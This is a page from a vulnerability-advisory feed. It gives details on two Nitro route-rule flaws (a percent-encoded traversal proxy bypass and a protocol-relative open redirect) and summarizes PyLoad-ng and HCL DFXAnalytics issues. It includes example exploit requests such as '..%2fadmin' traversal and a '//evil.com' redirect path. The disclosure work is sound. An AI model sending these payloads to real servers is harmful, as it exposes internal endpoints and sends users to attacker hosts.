A proxy route rule like: ```ts routeRules: { "/api/orders/**": { proxy: { to: "http://upstream/orders/**" } } } ``` is intended to limit the proxy to URLs under `/api/orders/`. Before the patch, an attacker could bypass that scope by sending percent-encoded path traversal (`..%2f`) in the URL, causing Nitro to forward a request that the upstream resolved outside the configured scope. Example exploit: ``` GET /api/orders/..%2fadmin%2fconfig.json ``` Nitro sees `..%2f` as opaque characters at match time, the `/api/orders/**` rule matched, and the raw path was forwarded to the upstream as `/orders/..%2fadmin/config.json`. An upstream that decodes `%2F` to `/` then resolved `..` and can serve `/admin/config.json` outside the intended scope. ### Are you affected? Users may be affected if **ALL** of the following are true: 1. Their project uses Nitro's `routeRules` with a `proxy` entry (`{ proxy: { to: "..." } }`). 2. The proxy `to` value uses a `/**` wildcard suffix to forward sub-paths. 3. The **upstream** behind the proxy decodes `%2F` as `/` before routing or filesystem lookup. 4. Proxy route rules are _not_ handled natively at CDN (nitro v3 and vercel) Whether the bypass actually leaks data depends on the upstream. Modern JS frameworks keep `%2F` opaque per RFC 3986 and are safe by construction. - **Safe examples:** H3 v2, Express v5, Hono v4 - modern JS frameworks keep `%2F` opaque per RFC 3986. - **Vulnerable examples:** naive imlementations that decodes the URL, static file servers, CGI dispatchers, Python `os.path`-based routing, anything sitting behind another layer that decodes `%2F` (common in microservice meshes). ## Impact Any HTTP path reachable from the Nitro server to the upstream could be requested, regardless of the configured `/**` scope. In typical deployments (API gateway, BFF, microservice proxy) this could expose internal admin endpoints, secrets endpoints, or other services the developer believed the scope rule fenced off. ## Patched versions Upgrade to one of: - [2.13.4](https://github.com/nitrojs/nitro/releases/tag/v2.13.4) or later (https://github.com/nitrojs/nitro/pull/4223) - [3.0.260429-beta](https://github.com/nitrojs/nitro/releases/tag/v3.0.260429-beta) or later (https://github.com/nitrojs/nitro/pull/4222) The fix canonicalizes the incoming pathname before building the upstream URL and rejects requests with `400 Bad Request` if the resolved path would escape the rule's base. The bytes forwarded upstream are unchanged when the request is allowed. > Note: the fix assumes the upstream does not double-decode percent-encoding. If your upstream decodes twice (`%252F → %2F → /`), it remains your responsibility to harden it. **Single-decode is standard**. ## Credits Reported by [@mHe4am](https://github.com/mHe4am) ([@he4am on HackerOne](https://hackerone.com/he4am)) via the [Vercel Open Source](https://hackerone.com/vercel-open-source?type=team) program.

Python Path Traversal
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-44372 MEDIUM PATCH GHSA This Month

A redirect route rule like: ```ts routeRules: { "/legacy/**": { redirect: "/**" } } ``` is intended to rewrite paths within the same host. Before the patch, an attacker could turn the rewrite into a cross-host redirect by sliding an extra slash in after the rule prefix. Example exploit: ``` GET /legacy//evil.com ``` Nitro stripped `/legacy` from the matched pathname and joined the remainder against the rule's target. The remainder was `//evil.com`, which the join preserved verbatim, so Nitro responded with `Location: //evil.com`. Browsers resolve `//evil.com` as a protocol-relative URL against the current scheme, sending the user to `https://evil.com`. ### Are you affected? Users may be affected if **all** of the following are true: 1. Their project uses Nitro's `routeRules` with a `redirect` entry. 2. The target uses a `/**` wildcard suffix to forward sub-paths (e.g. `redirect: "/**"`, `redirect: "/new/**"`, `proxy: { to: "http://upstream/**" }`). 3. The `redirect` rule is _not_ handled natively at the CDN layer. The `vercel`, `netlify`, `cloudflare-pages`, and `edgeone` presets translate `routeRules.redirect` into platform config (`vercel.json`, `_redirects`, EdgeOne v3 config) and serve the redirect at the edge - those deployments bypass the Nitro runtime entirely and are not affected. Every other preset executes the redirect through the Nitro runtime and can be vulnerable. ## Impact Open redirect from any host serving Nitro with a wildcard `redirect` rule. The redirect target is fully attacker-controlled, the URL looks legitimate (it starts with the victim's domain), and the browser silently follows it. ## Patched versions Upgrade to one of: - [2.13.4](https://github.com/nitrojs/nitro/releases/tag/v2.13.4) or later (or upgrade lockfile with latest ufo 1.6.4+) - [3.0.260429-beta](https://github.com/nitrojs/nitro/releases/tag/v3.0.260429-beta) or later (https://github.com/nitrojs/nitro/pull/4236) The fix has two parts: 1. `ufo` is bumped to `^1.6.4` ([unjs/ufo@5cd9e67](https://github.com/unjs/ufo/commit/5cd9e676711af3f4e4b5398ddf6ca8d52c1c7e1f)), which collapses any run of leading slashes to a single `/` inside `withoutBase`. This covers the typical `"/scope/**"` rule. 2. The Nitro runtime additionally collapses leading `//` before joining when the rule path itself is `/**` (in rare case which case `withoutBase` is never called and the raw pathname flows straight into `joinURL("", …)`).

Open Redirect
NVD GitHub VulDB
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-44226 MEDIUM PATCH GHSA This Month

PyLoad-ng WebUI discloses internal Python stack traces and source file paths to unauthenticated remote attackers via a global exception handler on the `/web/<path:filename>` endpoint. An attacker can request non-existent templates or craft malformed requests to trigger server exceptions and extract implementation details in HTTP responses without authentication. This information disclosure facilitates reconnaissance for follow-on attacks but does not enable direct code execution or data theft.

Python Information Disclosure
NVD GitHub VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2025-31970 MEDIUM This Month

HCL DFXAnalytics fails to enforce strict Content-Security-Policy (CSP) directives for object-src and base-uri, enabling attackers to inject and execute arbitrary scripts through cross-site scripting (XSS) vectors without authentication or user interaction. This network-accessible vulnerability affects all versions and results in information disclosure with a CVSS score of 5.3; no active exploitation has been reported.

XSS Dfxanalytics
NVD VulDB
CVSS 3.1
5.3
EPSS
0.0%
Prev Page 4 of 6 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy